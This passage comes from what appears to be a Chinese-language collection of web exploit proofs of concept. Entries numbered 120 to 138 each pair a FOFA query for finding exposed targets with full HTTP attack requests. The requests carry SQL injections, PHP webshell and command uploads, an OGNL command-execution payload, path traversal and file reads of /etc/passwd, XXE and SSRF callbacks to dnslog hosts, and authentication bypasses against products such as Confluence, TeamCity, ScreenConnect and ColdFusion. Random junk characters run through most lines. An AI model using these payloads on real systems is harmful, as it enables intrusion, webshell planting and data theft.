Sec-Fetch-Mode: cors: `+ R" ~8 _8 ~* O' g
Sec-Fetch-Site: same-origin
! f1 |, R8 T& [$ j; MX-Forwarded-For: 1.1.1.1* t3 i' D3 {. F9 }% K/ R
X-Originating-Ip: 1.1.1.1# i' i3 }5 R- y5 X
X-Remote-Ip: 1.1.1.1+ v; h, M2 M* Z0 `; |: ^) H2 Q
X-Remote-Addr: 1.1.1.1
& [* Z" p. B  b1 yTe: trailers
8 U9 T  G3 ?4 T/ M' r2 |Connection: close) G; \) r" a. t  k/ }4 l7 r

/ j: R5 s3 a. }6 F1 C  K( ^src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456$ S- t" M  a8 N( [# r3 O& \

. ]) P) x% h9 x2 [) m4 z7 v+ b
0 p4 X" o, X, |- t9 `120. 北京百绰智能S40管理平台导入web.php任意文件上传
6 L' T/ \7 N' ]- ]( k8 HCVE-2024-1253
# W4 {+ h* G! A+ j2 Y9 nFOFA:title="Smart管理平台"+ V2 |7 G, M6 X2 Q2 ~
POST /useratte/web.php? HTTP/1.1
* m  v/ a2 Y- o/ L! V! oHost: ip:port: Z  Q6 [: v- K! M5 E2 S* F
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
* e2 J4 T# U: y. J2 w) LUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
% ^* k3 A2 V6 W: K* P; aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% B& H, u- Z3 b- z& s+ f3 T- u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) V5 @( T- h" p2 j$ N
Accept-Encoding: gzip, deflate- f: k! B- u( O. p* g# B5 Q1 w/ r8 G
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
& u3 G* b% t$ W3 SContent-Length: 597
# B- X9 P1 p) gOrigin: https://ip:port2 w. H# O3 l* f
Referer: https://ip:port/sysmanage/licence.php/ Z8 k" D; W4 n$ D! P- U5 L, f/ {
Upgrade-Insecure-Requests: 1& T( e7 L9 I3 R6 F  N8 X
Sec-Fetch-Dest: document, u  W. W# w8 A; P: d0 p% ?; ]9 ]0 l
Sec-Fetch-Mode: navigate
9 m& o# Y* d+ c3 USec-Fetch-Site: same-origin! K# w6 C5 a/ G" ^7 L! R. g9 {
Sec-Fetch-User: ?1
$ ]9 O# {7 |& T0 a8 X% I, t* _0 NTe: trailers
; ]' K% e  Z" E) t$ Z5 ]  aConnection: close# h: g# f1 T$ O; L  ?3 G4 ~9 h
7 b5 D) H3 t" @* P1 G. g
-----------------------------42328904123665875270630079328" S3 P$ P/ z% A! F9 a% O
Content-Disposition: form-data; name="file_upload"; filename="2.php"
' @! e9 n2 a: }  DContent-Type: application/octet-stream- G! I; M" P. G4 v

3 J. O& ?- F4 n$ t<?php phpinfo()?>
, S. A: r$ v; Y; m3 M& s-----------------------------42328904123665875270630079328
* t  A# u3 }& h+ A" s2 kContent-Disposition: form-data; name="id_type"1 M) h7 k  K4 \: o: d( B

! Q! p) t1 f0 \# r) c5 O$ H1: }. u4 Y4 P6 d
-----------------------------42328904123665875270630079328& r$ |7 Q( P- v+ A/ @* B
Content-Disposition: form-data; name="1_ck") s. n% g# u; b0 X7 |9 [- T

; D& G/ W4 J5 ^" N# |1_radhttp: U$ H. F) z; ?. O" n
-----------------------------42328904123665875270630079328) u, k! l* m2 D+ R' W
Content-Disposition: form-data; name="mode"
9 A% B+ L7 W  Y/ g) ~5 K+ F/ W# U* n! B. [
import
+ |3 ^( f) P- n! r4 y, c/ A-----------------------------42328904123665875270630079328) r* }* B( q5 i0 O, m9 I

0 ]$ U! ?# O/ l1 M
5 O" Z$ T) y7 f( `5 e文件路径/upload/2.php1 }5 B; K- e: V" b

9 Y6 R: b( N+ J- k/ g121. 北京百绰智能S42管理平台userattestation.php任意文件上传" l( f9 J1 s; i2 G
CVE-2024-1918
" ~3 M( C% \1 C, Z' ~3 IFOFA:title="Smart管理平台"
$ e4 F/ e7 m! |+ k& m; MPOST /useratte/userattestation.php HTTP/1.16 s4 a8 x: V" }2 A, e- V( y5 z, o
Host: 192.168.40.130:8443: m9 B) z9 u, J0 Q! h' T! a4 C
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac505 X7 c' U0 W% J- ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
+ `8 I! ^$ m9 P9 B0 ?4 i; fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" v$ V5 ~6 _2 i, d5 N$ V" h( Q5 aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- j2 q( q8 B+ _. R* x9 Z
Accept-Encoding: gzip, deflate) ^  [& c, R$ }
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
+ h0 ^& h2 i" e  x% f# Z% eContent-Length: 592
& Y* c* O0 c' j! J% ~Origin: https://192.168.40.130:84433 T% j+ e, z$ Y. W. E6 n3 s0 [
Upgrade-Insecure-Requests: 1
& V( J- @- p  n& ySec-Fetch-Dest: document
1 A  p3 b. T" {Sec-Fetch-Mode: navigate' L2 u5 K+ Z8 k8 E) ~
Sec-Fetch-Site: same-origin9 m7 J$ v8 m$ O# s3 \6 a& r8 _
Sec-Fetch-User: ?1
$ M4 |/ H7 d/ D0 y% x0 @  @Te: trailers2 M. j) P) c) [5 H+ O
Connection: close, s  z0 i) q2 b' d
4 K+ T3 s( Q: u
-----------------------------42328904123665875270630079328$ u4 a0 \$ {5 v' }- y7 l7 p
Content-Disposition: form-data; name="web_img"; filename="1.php"
7 ^7 i8 {* \! GContent-Type: application/octet-stream% e" _7 w' c% R  I% \$ N6 r
: D* u; |4 g' G9 C1 X$ ^
<?php phpinfo();?>
+ ]2 L# t, X0 o  H- W-----------------------------423289041236658752706300793283 i# Z) D7 `6 O2 i% F
Content-Disposition: form-data; name="id_type"
$ h& A- N& h8 J+ ~6 G. @7 ?0 {, }
" h" G' U& _4 e8 {2 N9 m9 q1( h! y3 O4 S# v" z8 y# h; W. [
-----------------------------42328904123665875270630079328! b8 Z5 i$ l) G* O
Content-Disposition: form-data; name="1_ck"
. I, X0 y4 Y- v5 d  i1 A/ I: @! y5 n6 d3 Z+ u/ T
1_radhttp* B, R4 k( e6 `
-----------------------------42328904123665875270630079328
  N6 S9 m) D! F3 `" o5 W4 YContent-Disposition: form-data; name="hidwel"; [& i0 Z5 M+ t
8 ~- Z6 ?: q2 {6 x6 `
set
$ X/ H$ ~3 B$ }-----------------------------42328904123665875270630079328
" j. }5 p" f+ U
$ V" W% r+ G9 d' t& O8 e1 e5 k: ~2 J
boot/web/upload/weblogo/1.php
0 C" N6 _2 U+ p/ d" b# s2 X4 o! }* R- t/ P: z7 F$ j1 h, S
122. 北京百绰智能s200管理平台/importexport.php sql注入
, X6 \0 F8 T, J0 c) C$ m; q# }( zCVE-2024-27718FOFA:title="Smart管理平台"
3 Z; x, U* Y& m7 B其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()/ s4 z, i2 f5 O2 Z' z
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.17 W6 v* I" L& [
Host: x.x.x.x" h. h4 A8 t  f* _' r
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc03 o+ ]/ O& [8 X( V2 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.06 O3 h3 R: w8 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 Y3 E, [# U6 T; a( H9 ~9 d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& `) X; c- @9 Q& L/ U/ a( f8 gAccept-Encoding: gzip, deflate, br$ g4 ?9 [( a  p$ o8 S3 s0 X5 a( H
Upgrade-Insecure-Requests: 1( i! W) l0 G7 R* a0 D1 \) Q7 m$ U
Sec-Fetch-Dest: document* x8 M3 `- m& a7 H2 d+ W% H  d
Sec-Fetch-Mode: navigate
1 s) [0 [9 ^6 J. x3 \; sSec-Fetch-Site: none2 Q' J9 g. m3 D5 \: X) [$ m
Sec-Fetch-User: ?1
+ d8 a& N# N5 t" j% T& d  [" A8 STe: trailers
/ g% k/ S9 F& T) r7 a1 VConnection: close
( }: Y- J$ O( T5 S2 J: S
0 I. r1 Q7 K1 [% F! V) T3 ^2 I* E2 p$ p! T2 s) C1 R
123. Atlassian Confluence 模板注入代码执行" N1 f+ p2 ~6 W
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
4 x) A" r$ |3 R1 K/ QPOST /template/aui/text-inline.vm HTTP/1.14 d2 Y) P9 S1 t* \
Host: localhost:80907 ^3 h5 q+ q) |! \% F+ j0 \
Accept-Encoding: gzip, deflate, br* ~) a) S& H* O
Accept: */*
. n, b4 V' D( c0 \Accept-Language: en-US;q=0.9,en;q=0.8
# L# h8 N7 J' J5 J( q3 v8 ]& MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36& A( r% ~* i) B) l: W4 q% z' Q3 W
Connection: close8 ?+ Z1 i! z" K; `2 L  k+ h4 Y& j6 D
Content-Type: application/x-www-form-urlencoded# S# u2 B# x$ s5 u$ g0 z: t
. M. U7 F3 o/ v9 C% @. M5 }
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))8 a: i! y4 W! b
4 ~( P$ T) F0 t' n3 V& m4 ~0 u+ z1 M

) Y; Q$ t* |+ Z6 s( u) N124. 湖南建研工程质量检测系统任意文件上传6 O0 x4 y/ N) L
FOFA:body="/Content/Theme/Standard/webSite/login.css"
' E& p9 U+ ?% y6 C' {POST /Scripts/admintool?type=updatefile HTTP/1.1; i# v/ @5 q& D6 v/ ~6 K
Host: 192.168.40.130:8282
8 I+ k5 h/ u+ w  v. yUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.362 G' `3 O* r9 C2 ~3 R% D
Content-Length: 72- q5 v' c" ?$ D/ j$ _' {; O3 H: y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
: z, p% B: K: D5 p% t/ g6 ZAccept-Encoding: gzip, deflate, br
7 c! r( U- e7 s8 [! jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 `6 S" m" Q6 q. ]$ H' z
Connection: close+ V% F* T: o1 {+ O+ j
Content-Type: application/x-www-form-urlencoded( N& E( e: ~/ W( s% Y; }
4 s/ I' Q% B: K: A0 _! D
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>$ z3 m4 b" k9 ^# s: N+ n7 N

5 N1 ~# v  R5 d( y( G$ N, P
; B" |; [6 g, ehttp://192.168.40.130:8282/Scripts/abcgcg.aspx, D) _6 D+ H" F9 O8 x# ^+ m+ ^
% @) j3 C7 F8 L* w
125. ConnectWise ScreenConnect身份验证绕过6 g2 g2 A, l; P
CVE-2024-1709
. _+ A, C/ P" ]FOFA:icon_hash="-82958153"
4 y% R& z- M' D$ Y% c+ R0 p9 `https://github.com/watchtowrlabs ... bypass-add-user-poc
* K# G# j4 e$ Q" ]
4 A) J% d4 Z! K8 }2 J
# A' x  G' x( Y4 _; \2 h使用方法$ R' n( H- Y( w  s& Q
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
( V% m1 O( F! w" E9 v- _) s& u$ N+ @" n. @
& ^, u! [0 p  F. e/ r1 i; `4 w. ^
创建好用户后直接登录后台,可以执行系统命令。
/ b9 i1 Y" D' }8 o2 ?4 o) |
% I" l* y. O) M/ C; {126. Aiohttp 路径遍历" r, u" t. j' s9 Q2 A0 f8 Q
FOFA:title=="ComfyUI"6 |( Q$ z! _5 E. H; k$ y' {4 X
GET /static/../../../../../etc/passwd HTTP/1.1
9 Z; h! ^4 F, y7 M1 aHost: x.x.x.x
$ `7 v" |" W2 p. f& sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.369 U1 d* E+ M4 y# x
Connection: close3 M+ E3 N/ x& ?4 ~+ ], ?+ F8 }) M
Accept: */*
+ W" W* Z& R- t% H% T, X; C, \Accept-Language: en; X7 W: a+ U% s; ]" k  u0 Q
Accept-Encoding: gzip" @8 c8 I1 O6 {+ a: s

, X1 v  r+ h+ |" d5 ?+ x' A- C# L! B. G; H/ n! e* _7 a, ]3 [
127. 广联达Linkworks DataExchange.ashx XXE
9 P: v! J2 P- d) [( g) G- @, FFOFA:body="Services/Identification/login.ashx" , U. X9 E. F3 j6 O; ^1 r
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
/ ^0 R1 n, J  Q  g9 \0 wHost: 192.168.40.130:88882 o: X% s; B  I# K& |' I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
! [% B/ {4 f6 M0 Y  P8 c( wContent-Length: 4152 }* a; h5 J8 w1 V8 I7 ]% g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, @% Y+ j0 M3 O; @! x4 Z" ~: XAccept-Encoding: gzip, deflate
1 R3 S  n. |# ]9 w, w# hAccept-Language: zh-CN,zh;q=0.9
$ A0 l7 J* }* b4 m9 z% FConnection: close
  s  E+ o# _% I2 L: aContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
- H( V3 m9 x) Q, Z9 u# m6 vPurpose: prefetch% Q; |, r' A+ O; Y& Y% `! [! V
Sec-Purpose: prefetch;prerender
+ O7 x" M. E7 Q5 O2 j% q9 r$ P* y( T/ Y2 E
------WebKitFormBoundaryJGgV5l5ta05yAIe0
0 C* {8 u" D9 o5 L2 C, o5 s5 Y0 ]Content-Disposition: form-data;name="SystemName"
# n5 v/ F; L& v1 v" I  K, n! |6 `. ]. B; ?$ ^1 {
BIM
% g  A1 f0 M# V------WebKitFormBoundaryJGgV5l5ta05yAIe07 J+ d7 [' z1 a. m) q
Content-Disposition: form-data;name="Params"
5 S4 S2 S) B- f9 N+ p) PContent-Type: text/plain0 h; O/ P# h. D2 @+ X+ ~2 w5 @5 b

1 e& L' N9 Z5 I) C<?xml version="1.0" encoding="UTF-8"?># a# O% f9 W; N$ t; q, c
<!DOCTYPE test [1 \- v, y! j5 k
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">( V: [& l1 F0 F& ^( x8 u
]
% H3 ^/ R0 R) h. C# ^* L/ M( _>( m7 {" j3 K7 _0 r
<test>&t;</test>
7 t2 X# w' V& Y5 V% u& i------WebKitFormBoundaryJGgV5l5ta05yAIe0--+ K9 b1 ^/ C# h( T

" ?8 D# }: C, _( J. F) @1 `! Z" w

/ G& [4 Q( p" T9 e- j128. Adobe ColdFusion 反序列化
: m7 a9 d1 _6 v& G8 {" xCVE-2023-38203
/ m  o. X/ K4 c5 O  xAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本). m# ^9 \6 j+ D& U6 a
FOFA:app="Adobe-ColdFusion"& B- c& z  g, Y# \
PAYLOAD2 o% o9 E: S* @7 c) s8 M

9 _  h# _. R+ w+ i* H3 _# \129. Adobe ColdFusion 任意文件读取
  z( X' c$ U7 U' p5 QCVE-2024-207671 M4 I' e4 R: ^- r# d/ |
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"/ U3 o' C9 b$ K3 I5 u. E
第一步,获取uuid$ N. R+ q% i; _" J& U
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1/ b& C' y- i' @
Host: x.x.x.x
; a. b# ?1 y/ Y% T6 nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
2 \; e/ r2 m& q2 j; e: W0 fAccept: */*' G0 y2 n. z) C( n% Q# {
Accept-Encoding: gzip, deflate
5 R/ P0 _0 n1 S% u) `6 C! PConnection: close
2 F: j' g$ J; Z  ^9 y$ V- z  e2 u8 a3 J# n9 E' T8 s4 z
) r' m) W  ?+ C$ O  P% _3 _9 Z+ m
第二步,读取/etc/passwd文件- }* ~* p/ ~' `& K7 }& j, H: i
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1) J. g$ V. n8 P
Host: x.x.x.x' J( T3 G- X, y8 \2 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36' R' M! Z9 y+ n5 N; U1 O# Q
Accept: */*2 b3 d& _% o4 ~
Accept-Encoding: gzip, deflate- Y; _2 p- N0 p5 [0 l, g* U
Connection: close6 E$ f4 L$ r6 a$ C$ Y0 [; m
uuid: 85f60018-a654-4410-a783-f81cbd5000b9" k, X( H: ?* q3 `3 ^4 w7 X% @

2 T! Y/ E, u: |& \# Z
, h! @! `. ~( X! D, e& N$ [130. Laykefu客服系统任意文件上传+ y6 a: z! R7 Z3 L- |: h: k$ i. m  u5 t
FOFA:icon_hash="-334624619"
( O& h! X* O. c# D, S; bPOST /admin/users/upavatar.html HTTP/1.1
: [* b* x0 S9 w3 a: x" y  V3 NHost: 127.0.0.1
$ f" p; y1 t4 @2 DAccept: application/json, text/javascript, */*; q=0.01
/ m+ W1 @+ P/ ~2 M- r: H. ZX-Requested-With: XMLHttpRequest
1 x: f  W" ?# P: RUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.260 p, Z/ j+ c7 @) E. W( D/ I/ ?+ d
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR! U7 i0 ^. G' N
Accept-Encoding: gzip, deflate
8 {1 `+ f  q2 g, p# R6 R3 I/ NAccept-Language: zh-CN,zh;q=0.9# ?% h" y, V0 m$ k, Q3 M0 M
Cookie: user_name=1; user_id=34 V" P/ U- w1 R9 d4 f: r
Connection: close
9 v# y) X+ U0 ]9 e9 c
0 x' m' D, _. {8 f! d% _------WebKitFormBoundary3OCVBiwBVsNuB2kR" Z' \- I0 R' a& \8 T' l2 ]
Content-Disposition: form-data; name="file"; filename="1.php"8 K9 z* F' e4 E
Content-Type: image/png
( Y5 Y8 B' D% A+ w  n
) H9 R! @# u1 W3 A7 Q7 R- ]1 ^<?php phpinfo();@eval($_POST['sec']);?>3 o" J/ ^0 p' J6 s
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
8 l4 A- D' A( X: t# y4 Z% {# D
) t$ I8 B8 o8 M2 M; |" g6 W" t! Z( f: v7 V7 ?+ F3 u
131. Mini-Tmall <=20231017 SQL注入. l  S# z" Z4 {; J: e
FOFA:icon_hash="-2087517259"4 T4 a0 V: |4 a' d
后台地址:http://localhost:8080/tmall/admin/ i, i' S$ M' o
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0), B6 `* b, [* F. {9 h4 g: R

( s3 P+ S8 L- Q, k: i4 ?132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过3 ]3 ?6 x8 _3 _9 e( J+ z. ^
CVE-2024-27198
( l  z! v8 f7 IFOFA:body="Log in to TeamCity"
$ t% A7 Q9 O, A4 ?. I2 n8 X* S/ ~POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1+ U; Y0 }) r/ A1 L) f, O
Host: 192.168.40.130:8111
, U) J2 L9 g  C. qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, R) ]0 C0 w$ Y4 H) @3 o/ b7 E9 I$ Z
Accept: */*2 Z" I) M- c7 [0 t8 \
Content-Type: application/json2 t& q0 k  k0 @- \
Accept-Encoding: gzip, deflate3 t. N% r2 r; W( a

8 Z0 a, }) I. f" {{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}& l4 Q6 v. j3 z6 u7 V+ e1 p$ f+ X0 |6 e

6 a& C" i% C4 }5 F- }' f0 h- g4 @2 w3 d" r0 z6 J0 Q
CVE-2024-27199
& @) i- ]' }5 A0 V* t; H/res/../admin/diagnostic.jsp
: s5 n5 {8 `% B9 l) c; ~/.well-known/acme-challenge/../../admin/diagnostic.jsp
# r' ?% n! U, r! c0 d/update/../admin/diagnostic.jsp" F3 _  a9 o( L% y) `

4 u$ E, t, H' ~3 J7 {0 A2 g6 ]& j& D! d% `5 h- s9 F$ h/ l' W* e, V
CVE-2024-27198-RCE.py4 r" I0 \, m) ^; ]

# a0 O4 u+ Q7 v; o8 G8 |133. H5 云商城 file.php 文件上传: J* y4 |8 _2 k0 Z4 c* m- v' @
FOFA:body="/public/qbsp.php"
% [- D  P* o5 b, V* ZPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
% m. r, G% K& |9 q- SHost: your-ip
+ f  j$ @% c; j. V, FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
$ }$ y: E% R* {  t& V0 }! EContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
, `4 v4 r4 P9 D$ A7 ~, m
  N7 l1 ^6 m! s- l------WebKitFormBoundaryFQqYtrIWb8iBxUCx( _6 u- X$ R$ b7 ]; N
Content-Disposition: form-data; name="file"; filename="rce.php"9 ?) T! m9 U3 V6 b
Content-Type: application/octet-stream" o! T! I1 E0 B1 E8 W! @" v
# s3 q7 a$ G- z& Z& I
<?php system("cat /etc/passwd");unlink(__FILE__);?>
. c4 e2 u3 g; E# y5 K6 c9 H------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
) U: N2 Y- J" G+ r, n3 Y7 d1 S' n1 z  r

4 `; {8 e1 Y; x4 e+ \, A9 G5 b" e6 ]# `( x# v$ [
134. 网康NS-ASG应用安全网关index.php sql注入
; _+ L0 O6 Z7 H, iCVE-2024-2330
" `+ d; C9 w2 z! x) D( G/ G9 N( dNetentsec NS-ASG Application Security Gateway 6.3版本. e6 g! Y) j7 @- C) S; M, g
FOFA:app="网康科技-NS-ASG安全网关"
8 Z3 F; i6 |& D- j5 \6 JPOST /protocol/index.php HTTP/1.1
# ?! U4 W+ m8 A6 O' B+ p0 x9 M* \( I3 \Host: x.x.x.x
8 L: v5 D  p0 ~% D% M9 M# o% t+ D3 VCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de! \8 R9 Q; ?/ r/ e$ H' |- w' z* x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.04 D) |% v, n, e1 i& m
Accept: */*/ W4 H; z4 J' V/ A7 S* \. {* m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ j- N6 \+ F' G# C& ~* ~Accept-Encoding: gzip, deflate' ^- b8 J) C& ^0 E/ N% N+ s
Sec-Fetch-Dest: empty
" T0 v3 O1 _" [: m5 m6 f# MSec-Fetch-Mode: cors
  C, B5 T8 i- H* z; jSec-Fetch-Site: same-origin
/ F9 P, b( X( \Te: trailers
% h' S9 C& V  g- P  r, EConnection: close  [: M5 H3 i$ G$ j/ N
Content-Type: application/x-www-form-urlencoded9 S6 a' S) N) ?2 a& I0 Z
Content-Length: 263
6 i6 a9 G" Z" p: P( x$ ]- J6 D1 j" y7 k  M
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}: T. t, y& D+ y1 y+ J

( |2 _5 i9 V" L9 x/ S+ k' }
8 y  i8 h1 G& g135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入8 x% _0 b& Z  a& V7 w
CVE-2024-20227 A/ s: I" A- {& E# X
Netentsec NS-ASG Application Security Gateway 6.3版本2 E7 b" G; [+ O( T
FOFA:app="网康科技-NS-ASG安全网关"( O' G" a2 C' U
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1, Y  A1 [4 k% Z: ]
Host: x.x.x.x4 o; N5 L6 P0 N: ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
! \2 T6 l0 B' A, B8 y  m7 q; n$ x6 _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; [+ Q9 |4 v# `/ `8 I4 G/ C
Accept-Encoding: gzip, deflate# v, E; `: T0 b& q/ }
Accept-Language: zh-CN,zh;q=0.9) ~) |# D- O6 U8 p
Connection: close" K6 g# {3 G  T6 [1 x4 F
* d+ n( p* ?! D; M8 J3 v; W2 e3 p; g6 Z7 d

0 f4 t4 b* H. m8 ]; `4 Y136. NextChat cors SSRF
# J- f  N& `% a: n/ m* u( YCVE-2023-49785
: j9 N+ z( p% N9 e4 G) l, ^' PFOFA:title="NextChat"- Y6 k+ ~  d, L0 U# m
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
$ Q. f  a. y3 ~' m5 K8 kHost: x.x.x.x:10000
! X: J2 c8 }) Y& Y8 h% m8 JUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, q% i9 f' Y# m, E+ H) t, V; O* D
Connection: close
0 \/ `2 B, Y& _, c4 rAccept: */*
9 {& c# q/ R- a2 S; @. U) Q5 @Accept-Language: en
8 P0 h3 e; J1 ]% T5 o1 E8 R% ]3 MAccept-Encoding: gzip
5 V' }3 R$ k  Y3 g4 a) r: X/ Z. i5 T0 ]1 k- Y

# y% K+ C/ d1 z2 g: M9 `137. 福建科立迅通信指挥调度平台down_file.php sql注入
! m- J! b$ ~/ tCVE-2024-26203 @0 u+ X- h% G7 X. i. ~
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
: ?+ ~8 G# c/ dGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
1 c% E* N$ d2 t3 P3 q& NHost: x.x.x.x! s& e: |! v! D$ X7 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; V0 E7 H0 K# d; z; {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# X% ]" J5 ]5 q0 E2 S0 k4 c5 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: J: L" c' }8 q: u& [
Accept-Encoding: gzip, deflate, br
, q" M) H. u0 CConnection: close
( @+ _. _( X6 j) l) NCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj( j1 [" @& t# M3 V- z" X8 E
Upgrade-Insecure-Requests: 16 P4 n6 g1 s( R" i) Q3 `8 J

2 x7 E* j" S4 @( [
  k% T6 N' n! c$ P7 w9 k138. 福建科立讯通信指挥调度平台pwd_update.php sql注入" z7 ~, r: \7 v9 k6 s
CVE-2024-26211 o- q' Z2 G, ~
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"$ y& i5 r4 k8 D) f0 G$ ^
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.10 ~  m: S# C4 u
Host: x.x.x.x
: w! H( h; J3 e! d8 n$ m2 @+ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, {0 w0 T# F; V3 J4 v2 r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
